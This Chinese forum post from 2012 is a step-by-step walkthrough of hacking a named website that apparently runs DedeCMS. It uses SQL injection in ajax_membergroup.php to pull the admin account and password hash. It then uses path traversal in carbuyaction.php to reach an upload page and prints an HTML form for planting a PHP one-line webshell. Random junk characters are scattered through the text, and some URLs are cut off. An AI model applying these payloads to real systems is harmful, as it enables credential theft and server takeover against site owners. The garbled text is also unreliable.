①注入漏洞。' \! w5 I$ X5 k0 f; E9 I- ^, ^
这站 http://www.political-security.com/& z% g z) k' p4 @: @4 k
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
4 T, N- e0 Y: V) b1 |www.political-security.com/data/mysql_error_trace.inc 爆后台
3 l0 }, c( |2 j' _; z/ Q+ D然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。7 e* {9 u" k8 L) K. b% c# B
然后写上语句 * Q% c, g/ W4 ^% ^- ^" w
查看管理员帐号
7 y# k, T7 B8 V0 `1 f6 m5 Yhttp://www.political-security.co ... &membergroup=@`
, Q( ^/ k; {' @5 y# H+ o$ n4 n( ]1 L5 ?. C! X; t! }/ ^
admin , \8 g" U3 J, j; T/ U
. |' d3 D; ~3 o" g l! h2 X, [; N8 f
查看管理员密码
, P9 Z6 t# ]! t, c; ?( b; B http://www.political-security.co ... &membergroup=@`
) `6 S) `6 a. O% {) j4 i( L7 f t# _, F
8d29b1ef9f8c5a5af429 A4 e' ~. W4 Q4 p2 d
- K6 j# ^( q# [
查看管理员密码3 X4 k% X+ r& ]' b
$ _+ G. E _$ E8 e
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5$ N7 {. a7 G/ Y- W' T1 a7 D
& O, Q5 R" O s, a i( g
8d2 p6 X; h4 Q7 m! P1 \
9b1ef9f8c5a5af42
1 d, N. I! |* S: k5 r/ t9
. _0 g$ J9 R/ \
* z @+ {% e( H) Ycmd5没解出来 只好测试第二个方法
& A. p8 U' H. U& |1 z4 M: G! p9 x# f1 F# E3 |
$ e: o; X: n4 V5 y1 ]; k0 [
②上传漏洞:
% t& O# x6 `3 e8 W1 o" c0 c! Z+ a
6 B+ m y$ u) d$ z只要登陆会员中心,然后访问页面链接4 A2 J) @; Y0 K5 b5 u5 O2 G# e- I& V
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”" b; g5 V9 C. ^# o9 e7 O
; j# e+ L, t& s. [. S# L
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
0 B8 ?' t0 P% U- |% a7 v1 n2 {6 |, A) G: I6 k
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm5 X7 ?! g# N6 I7 i9 J
7 B d' Y J. t! [+ m
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
/ I+ ^5 \8 n/ a6 u1 Z# d或者
2 Z3 \9 N9 e- Z7 r |" v* a: g即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对